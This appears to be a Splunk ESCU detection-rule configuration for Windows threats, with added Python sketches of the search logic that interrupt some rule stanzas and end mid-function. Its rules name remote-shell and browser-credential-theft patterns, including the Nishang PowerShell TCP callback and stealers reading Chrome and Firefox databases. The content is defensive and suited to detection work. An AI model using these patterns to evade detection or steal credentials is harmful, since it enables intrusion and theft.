action.escu = 0 action.escu.enabled = 1 description = This analytic looks for a spawned process of the route.exe Windows application. Adversaries and red teams alike abuse this application to perform reconnaissance or network discovery on a target host. One possible false positive might be an automated tool used by a system administrator or a PowerShell script in Amazon EC2 config services. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016", "T1016.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for a spawned process of the route.exe Windows application. Adversaries and red teams alike abuse this application to perform reconnaissance or network discovery on a target host. One possible false positive might be an automated tool used by a system administrator or a PowerShell script in Amazon EC2 config services. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A network operator or systems administrator may utilize an automated host discovery application that may generate false positives, or an Amazon EC2 script that uses this application. Filter as needed. 
action.escu.creation_date = 2024-02-14
action.escu.modification_date = 2024-02-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Network Discovery Using Route Windows App - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Discovery", "Qakbot", "CISA AA22-277A", "Windows Post-Exploitation", "Prestige Ransomware"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Network Discovery Using Route Windows App - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Qakbot", "CISA AA22-277A", "Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1016", "T1016.001"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_route` by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `network_discovery_using_route_windows_app_filter`

[ESCU - Network Share Discovery Via Dir Command - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies object access on Windows administrative SMB shares (ADMIN$, IPC$, C$). This represents suspicious behavior, as these shares are commonly used by tools like PsExec/PaExec and others to stage service binaries before creating and starting a Windows service on remote endpoints. Red Teams and adversaries alike may abuse administrative shares for lateral movement and remote code execution. The IcedID malware family also implements this behavior to try to infect other machines in the infected network. Note that the search matches EventCode 5140 with AccessMask 0x1 (ReadData/ListDirectory), which is the access a directory listing such as `dir \\host\C$` produces; a write that stages a binary on the share carries a different mask.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1135"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies object access on Windows administrative SMB shares (ADMIN$, IPC$, C$). This represents suspicious behavior, as these shares are commonly used by tools like PsExec/PaExec and others to stage service binaries before creating and starting a Windows service on remote endpoints. Red Teams and adversaries alike may abuse administrative shares for lateral movement and remote code execution. The IcedID malware family also implements this behavior to try to infect other machines in the infected network. Note that the search matches EventCode 5140 with AccessMask 0x1 (ReadData/ListDirectory), which is the access a directory listing such as `dir \\host\C$` produces; a write that stages a binary on the share carries a different mask.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with EventCode 5140 enabled. The Windows TA is also required. Also enable Object Access auditing (the File Share subcategory) for both success and failure in your Group Policy.
action.escu.known_false_positives = System administrators may use tools like net.exe or the dir command line for troubleshooting or administrative tasks. However, this will typically come only from certain users and certain systems that can be added to an allow list.
action.escu.creation_date = 2023-05-23
action.escu.modification_date = 2023-05-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Network Share Discovery Via Dir Command - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["IcedID"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Network Share Discovery Via Dir Command - Rule
action.correlationsearch.annotations = {"analytic_story": ["IcedID"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1135"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=5140 ShareName IN("\\\\*\\ADMIN$","\\\\*\\C$","*\\\\*\\IPC$") AccessMask= 0x1 | stats min(_time) as firstTime max(_time) as lastTime count by ShareName IpAddress ObjectType SubjectUserName SubjectDomainName IpPort AccessMask Computer | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `network_share_discovery_via_dir_command_filter`

[ESCU - Network Traffic to Active Directory Web Services Protocol - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies network traffic to Active Directory Web Services Protocol. This protocol is used to manage Active Directory. The analytic is meant to be tuned and filtered to the specific environment. It will assist defenders in identifying suspicious processes accessing port 9389.
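The following is an added example and not part of the ESCU content or any Splunk code: a Python rendering of the `Network Share Discovery Via Dir Command` search logic above (EventCode 5140, an administrative share, AccessMask exactly 0x1) run over a few constructed events, with an AccessMask decoder that shows why the 0x1 filter catches a `dir \\host\C$` listing but not the write (0x2) that PsExec-style service staging produces. Field names follow the search as the Windows TA extracts them; the events, hosts and account names are made up.

```python
"""Added example (not part of Splunk ESCU): evaluate Windows Security event
5140 records the way the 'Network Share Discovery Via Dir Command' search
does and decode AccessMask. All sample events below are constructed."""
import re

# \\<host-or-*>\ADMIN$ , \\...\C$ , \\...\IPC$ as Windows writes ShareName
ADMIN_SHARE_RE = re.compile(r"^\\\\[^\\]+\\(ADMIN\$|C\$|IPC\$)$", re.IGNORECASE)

# File/directory access rights as reported in the AccessMask field.
ACCESS_RIGHTS = {
    0x1: "ReadData/ListDirectory",
    0x2: "WriteData/AddFile",
    0x4: "AppendData/AddSubdirectory",
    0x20: "Execute/Traverse",
    0x40: "DeleteChild",
    0x10000: "DELETE",
    0x20000: "READ_CONTROL",
}


def decode_access_mask(mask):
    """Names of the rights set in an AccessMask integer, in bit order."""
    return [name for bit, name in ACCESS_RIGHTS.items() if mask & bit]


def is_admin_share_listing(event):
    """Mirror the search: EventCode 5140, admin share, AccessMask exactly 0x1."""
    if event.get("EventCode") != 5140:
        return False
    if not ADMIN_SHARE_RE.match(event.get("ShareName", "")):
        return False
    return int(event["AccessMask"], 16) == 0x1


def triage(events):
    """stats count, min/max _time by (IpAddress, SubjectUserName, ShareName)."""
    out = {}
    for ev in events:
        if not is_admin_share_listing(ev):
            continue
        key = (ev["IpAddress"], ev["SubjectUserName"], ev["ShareName"])
        rec = out.setdefault(key, {"count": 0, "firstTime": ev["_time"], "lastTime": ev["_time"]})
        rec["count"] += 1
        rec["firstTime"] = min(rec["firstTime"], ev["_time"])
        rec["lastTime"] = max(rec["lastTime"], ev["_time"])
    return out


SAMPLE_EVENTS = [  # constructed for this example
    # two 'dir \\fs01\C$' listings from the same client
    {"_time": 1700000000, "EventCode": 5140, "ShareName": r"\\*\C$", "AccessMask": "0x1",
     "IpAddress": "10.0.0.5", "SubjectUserName": "jdoe", "Computer": "fs01"},
    {"_time": 1700000060, "EventCode": 5140, "ShareName": r"\\*\C$", "AccessMask": "0x1",
     "IpAddress": "10.0.0.5", "SubjectUserName": "jdoe", "Computer": "fs01"},
    # a write to ADMIN$ (service binary staging): not matched by the 0x1 filter
    {"_time": 1700000120, "EventCode": 5140, "ShareName": r"\\*\ADMIN$", "AccessMask": "0x2",
     "IpAddress": "10.0.0.7", "SubjectUserName": "svc_deploy", "Computer": "fs01"},
    # a read on an ordinary share is out of scope
    {"_time": 1700000180, "EventCode": 5140, "ShareName": r"\\*\Public", "AccessMask": "0x1",
     "IpAddress": "10.0.0.9", "SubjectUserName": "amy", "Computer": "fs01"},
]

if __name__ == "__main__":
    for key, rec in triage(SAMPLE_EVENTS).items():
        print(key, rec)
    print("0x2 decodes to", decode_access_mask(0x2))
```

Run stand-alone it prints one aggregated row for the two listings from 10.0.0.5 and shows that the ADMIN$ write decodes to WriteData/AddFile, which is exactly the event this search does not return; pair it with a write-oriented admin-share detection if staging is what you want to see.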
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.AE"]}
action.escu.data_models = ["Network_Traffic"]
action.escu.eli5 = The following analytic identifies network traffic to Active Directory Web Services Protocol. This protocol is used to manage Active Directory. The analytic is meant to be tuned and filtered to the specific environment. It will assist defenders in identifying suspicious processes accessing port 9389.
action.escu.how_to_implement = The detection is based on data that originates from network traffic logs. The logs must contain the source and destination IP addresses, the application name, and the destination port. The logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the network traffic data source. The logs must also be mapped to the `Network_Traffic` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives should be limited, as the destination port is specific to the Active Directory Web Services Protocol; however, we recommend utilizing this analytic to hunt for non-standard processes querying the ADWS port. Filter by app or dest_ip to AD servers and remove known processes querying ADWS.
action.escu.creation_date = 2024-03-14
action.escu.modification_date = 2024-03-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Network Traffic to Active Directory Web Services Protocol - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Windows Discovery Techniques"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Network Traffic to Active Directory Web Services Protocol - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic where All_Traffic.dest_port=9389 by All_Traffic.src_ip, All_Traffic.dest_ip, All_Traffic.app, All_Traffic.user, All_Traffic.dest_port | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name("All_Traffic")` | `network_traffic_to_active_directory_web_services_protocol_filter`

[ESCU - Nishang PowershellTCPOneLine - Rule]
action.escu = 0
action.escu.enabled = 1
description = This query detects the Nishang Invoke-PowerShellTCPOneLine utility, a PowerShell one-liner that spawns a callback to a remote command and control server. It will also capture other Nishang utilities that place the same .NET classes on the command line. Triage the endpoint and identify any parallel processes that look suspicious. Review the reputation of the remote IP or domain contacted by the PowerShell process.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This query detects the Nishang Invoke-PowerShellTCPOneLine utility, a PowerShell one-liner that spawns a callback to a remote command and control server. It will also capture other Nishang utilities that place the same .NET classes on the command line. Triage the endpoint and identify any parallel processes that look suspicious. Review the reputation of the remote IP or domain contacted by the PowerShell process.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives may be present. Filter as needed based on initial analysis.
action.escu.creation_date = 2021-03-03
action.escu.modification_date = 2021-03-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - Nishang PowershellTCPOneLine - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["HAFNIUM Group"]
action.risk = 1
action.risk.param._risk_message = Possible Nishang Invoke-PowerShellTCPOneLine behavior on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Nishang PowershellTCPOneLine - Rule
action.correlationsearch.annotations = {"analytic_story": ["HAFNIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This query detects the Nishang Invoke-PowerShellTCPOneLine utility, a PowerShell one-liner that spawns a callback to a remote command and control server. It will also capture other Nishang utilities that place the same .NET classes on the command line. Triage the endpoint and identify any parallel processes that look suspicious. Review the reputation of the remote IP or domain contacted by the PowerShell process.
action.notable.param.rule_title = Nishang PowershellTCPOneLine
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process=*Net.Sockets.TCPClient* AND Processes.process=*System.Text.ASCIIEncoding*) by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `nishang_powershelltcponeline_filter`

[ESCU - NLTest Domain Trust Discovery - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for the execution of `nltest.exe` with command-line arguments utilized to query for domain trust information. Two arguments are matched: `/domain_trusts`, which returns a list of trusted domains, and `/all_trusts`, which returns all trusted domains. Red Teams and adversaries alike use NLTest.exe to enumerate the current domain to assist with further understanding where to pivot next.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for the execution of `nltest.exe` with command-line arguments utilized to query for domain trust information. Two arguments are matched: `/domain_trusts`, which returns a list of trusted domains, and `/all_trusts`, which returns all trusted domains. Red Teams and adversaries alike use NLTest.exe to enumerate the current domain to assist with further understanding where to pivot next.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators may use nltest for troubleshooting purposes; otherwise it is rarely used.
action.escu.creation_date = 2022-04-18
action.escu.modification_date = 2022-04-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - NLTest Domain Trust Discovery - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ryuk Ransomware", "Domain Trust Discovery", "IcedID", "Active Directory Discovery", "Qakbot", "Rhysida Ransomware"]
action.risk = 1
action.risk.param._risk_message = Domain trust discovery execution on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - NLTest Domain Trust Discovery - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware", "Domain Trust Discovery", "IcedID", "Active Directory Discovery", "Qakbot", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1482"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search looks for the execution of `nltest.exe` with command-line arguments utilized to query for domain trust information. Two arguments are matched: `/domain_trusts`, which returns a list of trusted domains, and `/all_trusts`, which returns all trusted domains. Red Teams and adversaries alike use NLTest.exe to enumerate the current domain to assist with further understanding where to pivot next.
action.notable.param.rule_title = NLTest Domain Trust Discovery
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_nltest` (Processes.process=*/domain_trusts* OR Processes.process=*/all_trusts*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `nltest_domain_trust_discovery_filter`

[ESCU - Non Chrome Process Accessing Chrome Default Dir - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is to detect an anomaly event of a non-Chrome process accessing the files in the Chrome user default folder. This folder contains all the SQLite databases of the Chrome browser related to user logins, history, cookies and so on. Most RATs and trojan spies, as well as the FIN7 JSSLoader, try to parse those SQLite databases to collect information on the compromised host. A SACL that generates event 4663 needs to be set on the Chrome user data directory to be able to use this. Since this monitors access to the folder, we observed noise that needs to be filtered out and hence added the SQLite DB browser and explorer.exe to the allow list to make this detection more stable.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555", "T1555.003"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search is to detect an anomaly event of a non-Chrome process accessing the files in the Chrome user default folder. This folder contains all the SQLite databases of the Chrome browser related to user logins, history, cookies and so on. Most RATs and trojan spies, as well as the FIN7 JSSLoader, try to parse those SQLite databases to collect information on the compromised host. A SACL that generates event 4663 needs to be set on the Chrome user data directory to be able to use this. Since this monitors access to the folder, we observed noise that needs to be filtered out and hence added the SQLite DB browser and explorer.exe to the allow list to make this detection more stable.
action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure." A SACL must also be placed on the Chrome user data directory, since 4663 is only generated for objects that carry one.
action.escu.known_false_positives = Other browsers or tools not listed that access the Chrome user data directory may be caught by this rule.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Non Chrome Process Accessing Chrome Default Dir - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Remcos", "NjRAT", "Warzone RAT", "3CX Supply Chain Attack", "RedLine Stealer", "FIN7", "DarkGate Malware", "AgentTesla", "CISA AA23-347A", "Phemedrone Stealer", "Snake Keylogger"]
action.risk = 1
action.risk.param._risk_message = a non chrome browser process $process_name$ accessing $Object_Name$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Non Chrome Process Accessing Chrome Default Dir - Rule
action.correlationsearch.annotations = {"analytic_story": ["Remcos", "NjRAT", "Warzone RAT", "3CX Supply Chain Attack", "RedLine Stealer", "FIN7", "DarkGate Malware", "AgentTesla", "CISA AA23-347A", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555", "T1555.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4663 NOT (process_name IN ("*\\chrome.exe", "*\\explorer.exe", "*sql*")) Object_Name="*\\Google\\Chrome\\User Data\\Default*" | stats count min(_time) as firstTime max(_time) as lastTime by Object_Name Object_Type process_name Access_Mask Accesses process_id EventCode dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `non_chrome_process_accessing_chrome_default_dir_filter`

[ESCU - Non Firefox Process Access Firefox Profile Dir - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is to detect an anomaly event of a non-Firefox process accessing the files in the Firefox profile folder. This folder contains all the SQLite databases of the Firefox browser related to user logins, history, cookies and so on. Most RATs and trojan spies, as well as the FIN7 JSSLoader, try to parse those SQLite databases to collect information on the compromised host. A SACL that generates event 4663 needs to be set on the Firefox profile directory to use this. Since this monitors access to the folder, we have observed noise and hence added `sqlite db browser` and `explorer.exe` to the allow list to make this detection more stable.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555", "T1555.003"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search is to detect an anomaly event of a non-Firefox process accessing the files in the Firefox profile folder. This folder contains all the SQLite databases of the Firefox browser related to user logins, history, cookies and so on. Most RATs and trojan spies, as well as the FIN7 JSSLoader, try to parse those SQLite databases to collect information on the compromised host. A SACL that generates event 4663 needs to be set on the Firefox profile directory to use this. Since this monitors access to the folder, we have observed noise and hence added `sqlite db browser` and `explorer.exe` to the allow list to make this detection more stable.
action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure." A SACL must also be placed on the Firefox profile directory, since 4663 is only generated for objects that carry one.
action.escu.known_false_positives = Other browsers or tools not listed that access the Firefox profile directory may be caught by this rule.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Non Firefox Process Access Firefox Profile Dir - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Azorult", "Remcos", "NjRAT", "Warzone RAT", "3CX Supply Chain Attack", "RedLine Stealer", "FIN7", "DarkGate Malware", "AgentTesla", "CISA AA23-347A", "Phemedrone Stealer", "Snake Keylogger"]
action.risk = 1
action.risk.param._risk_message = a non firefox browser process $process_name$ accessing $Object_Name$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Non Firefox Process Access Firefox Profile Dir - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Remcos", "NjRAT", "Warzone RAT", "3CX Supply Chain Attack", "RedLine Stealer", "FIN7", "DarkGate Malware", "AgentTesla", "CISA AA23-347A", "Phemedrone Stealer", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1555", "T1555.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4663 NOT (process_name IN ("*\\firefox.exe", "*\\explorer.exe", "*sql*")) Object_Name="*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles*" | stats count min(_time) as firstTime max(_time) as lastTime by Object_Name Object_Type process_name Access_Mask Accesses process_id EventCode dest user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `non_firefox_process_access_firefox_profile_dir_filter`

[ESCU - Notepad with no Command Line Arguments - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies behavior related to the default SliverC2 framework, where it will inject into Notepad.exe and spawn Notepad.exe with no command line arguments. In testing, this is a common procedure for SliverC2 usage; however, it may be modified or changed. From Microsoft, "The Sideload, SpawnDll, and Execute-Assembly commands spawn and inject into notepad.exe by default. The following query finds process creation events where the same process creates and injects into notepad.exe within 10 seconds."
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies behavior related to the default SliverC2 framework, where it will inject into Notepad.exe and spawn Notepad.exe with no command line arguments. In testing, this is a common procedure for SliverC2 usage; however, it may be modified or changed. From Microsoft, "The Sideload, SpawnDll, and Execute-Assembly commands spawn and inject into notepad.exe by default. The following query finds process creation events where the same process creates and injects into notepad.exe within 10 seconds."
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives may be present and filtering may need to occur based on organization endpoint behavior.
action.escu.creation_date = 2023-02-22
action.escu.modification_date = 2023-02-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Notepad with no Command Line Arguments - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["BishopFox Sliver Adversary Emulation Framework"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ with no command line arguments.
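As an added example (not Splunk code; the events are constructed and the field names follow the two searches as the Windows TA extracts them), the allow-list and path logic of the Non Chrome and Non Firefox profile-directory searches above in Python. It includes the case in which the `*sql*` allow pattern exempts any process whose path merely contains `sql`, which a practitioner should narrow to the specific SQLite tooling in use before relying on the rule:

```python
"""Added example (not Splunk's own code): apply the process allow list and
Object_Name path filters of the 'Non Chrome Process Accessing Chrome Default
Dir' and 'Non Firefox Process Access Firefox Profile Dir' searches to sample
Security event 4663 records. All sample events are constructed."""
import fnmatch

# browser -> (allowed process_name patterns, monitored Object_Name pattern), as in the searches
PROFILES = {
    "chrome": (["*\\chrome.exe", "*\\explorer.exe", "*sql*"],
               "*\\Google\\Chrome\\User Data\\Default*"),
    "firefox": (["*\\firefox.exe", "*\\explorer.exe", "*sql*"],
                "*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles*"),
}


def _glob(pattern, value):
    """Splunk-style wildcard match ('*' only, case-insensitive) via fnmatch."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def classify(event):
    """Browser whose profile directory a non-allow-listed process touched, else None."""
    if event.get("EventCode") != 4663:
        return None
    proc, obj = event.get("process_name", ""), event.get("Object_Name", "")
    for browser, (allowed, path) in PROFILES.items():
        if _glob(path, obj) and not any(_glob(p, proc) for p in allowed):
            return browser
    return None


def summarize(events):
    """stats count by (browser, process_name, Object_Name) for matching events."""
    counts = {}
    for ev in events:
        browser = classify(ev)
        if browser:
            key = (browser, ev["process_name"], ev["Object_Name"])
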